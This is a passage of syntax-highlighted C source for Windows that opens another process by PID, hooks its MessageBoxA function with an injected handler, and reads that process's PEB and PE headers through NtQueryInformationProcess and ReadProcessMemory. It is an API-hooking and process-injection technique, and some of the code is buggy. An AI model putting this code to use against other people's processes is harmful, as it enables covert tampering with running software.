<span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="w"> </span><span class="n">atoi</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Usage: %s PID"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Try to open the specified process */</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcess</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_QUERY_INFORMATION</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_VM_OPERATION</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_VM_READ</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_VM_WRITE</span><span class="w"> </span><span class="o">|</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_SET_QUOTA</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">hProcess</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] OpenProcess() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Remote Process with PID=%d opened</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Hook shit */</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">HookFunction</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"USER32.DLL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"MessageBoxA"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">handler</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">handler</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHookContext</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Hooking failed</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] hooked</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">Sleep</span><span class="p">(</span><span class="mi">50000</span><span class="p">);</span><span class="w"> </span><span class="c1">// Sleep 60 seconds. Try now the new behaviour of the function :)</span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReleaseHook</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Release Hook failed</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Hook released</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProcess</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">DWORD</span><span class="w"></span>
<span class="nf">FindRemotePEB</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">HMODULE</span><span class="w"> </span><span class="n">hNTDll</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">FARPROC</span><span class="w"> </span><span class="n">fpNtQueryInformationProcess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">NTSTATUS</span><span class="w"> </span><span class="n">status</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PROCESS_BASIC_INFORMATION</span><span class="w"> </span><span class="n">procBasicInformation</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">ULONG</span><span class="w"> </span><span class="n">returnLength</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">hNTDll</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ntdll"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">hNTDll</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"LoadLibraryA() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fpNtQueryInformationProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetProcAddress</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hNTDll</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">"NtQueryInformationProcess"</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">fpNtQueryInformationProcess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"GetProcAddress() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">NtQueryInformationProcess</span><span class="w"> </span><span class="n">ntQueryInformationProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="n">NtQueryInformationProcess</span><span class="p">)</span><span class="n">fpNtQueryInformationProcess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ntQueryInformationProcess</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="c1">// ProcessBasicInformation</span>
<span class="w"> </span><span class="o">&</span><span class="n">procBasicInformation</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESS_BASIC_INFORMATION</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">returnLength</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">status</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"NtQueryInformationProcess() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">status</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">procBasicInformation</span><span class="p">.</span><span class="n">PebBaseAddress</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/* Get's the PEB of the own process */</span><span class="w"></span>
<span class="n">DWORD</span><span class="w"> </span>
<span class="nf">FindOwnPEB</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pebAddr</span><span class="p">;</span><span class="w"></span>
<span class="cp">#ifdef _WIN32</span>
<span class="w"> </span><span class="n">_asm</span><span class="w"> </span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">eax</span><span class="w"> </span><span class="c1">// push the values of the register eax on the stack</span>
<span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="w"> </span><span class="n">FS</span><span class="o">:</span><span class="p">[</span><span class="mh">0x30</span><span class="p">]</span><span class="w"> </span><span class="c1">// store the values ad address FS:[0x30] in eax</span>
<span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="p">[</span><span class="n">pebAddr</span><span class="p">],</span><span class="w"> </span><span class="n">eax</span><span class="w"> </span><span class="c1">// store the values of eax in the variable pebAddr</span>
<span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">eax</span><span class="w"> </span><span class="c1">// remake initial eax value</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="cp">#ifdef _WIN64</span>
<span class="w"> </span><span class="n">_asm</span><span class="w"></span>
<span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">rax</span><span class="w"></span>
<span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">rax</span><span class="p">,</span><span class="w"> </span><span class="n">FS</span><span class="o">:</span><span class="p">[</span><span class="mh">0x30</span><span class="p">]</span><span class="w"></span>
<span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="p">[</span><span class="n">pebAddr</span><span class="p">],</span><span class="w"> </span><span class="n">rax</span><span class="w"></span>
<span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">rax</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pebAddr</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"></span>
<span class="nf">ReadRemoteDataDirectoryRVA</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPCVOID</span><span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">index</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_NT_HEADERS32</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">dataDir</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BYTE</span><span class="o">*</span><span class="w"> </span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">oldProtect</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">index</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="n">index</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mi">16</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"No valid DATA_DIRECTORY directory</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">BUFFER_SIZE</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"malloc() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)</span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">oldProtect</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx() failed in ReadRemoteDataDirectoryRVA() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory() failed in ReadRemoteDataDirectoryRVA() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DOS_HEADER</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x5a4d</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid DOS header. e_magic is not 0x5a4d</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_NT_HEADERS32</span><span class="p">)(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_lfanew</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="c1">// PE32</span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x20b</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// PE32+</span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid Magic in OptionalHeader</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Detected %s architecture</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"PE32"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"PE32+"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">dataDir</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="n">pNTHeaders</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">DataDirectory</span><span class="p">[</span><span class="n">index</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">dataDir</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/*</span>
<span class="cm"> * Caller has to free the returned LOADED_IMAGE structure.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">PLOADED_IMAGE</span><span class="w"> </span><span class="nf">ReadRemoteImage</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DOS_HEADER</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PLOADED_IMAGE</span><span class="w"> </span><span class="n">pImage</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory() failed in ReadRemoteImage() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pDOSHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span><span class="n">lpBuffer</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">LOADED_IMAGE</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pImage</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"malloc() failed in ReadRemoteImage() with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_NT_HEADERS32</span><span class="p">)(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_lfanew</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">NumberOfSections</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">Sections</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_SECTION_HEADER</span><span class="p">)(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_lfanew</span><span class="w"> </span><span class="o">+</span><span class="w"> </span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_NT_HEADERS32</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x5a4d</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid DOS header. e_magic is not 0x5a4d</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="c1">// PE32</span>
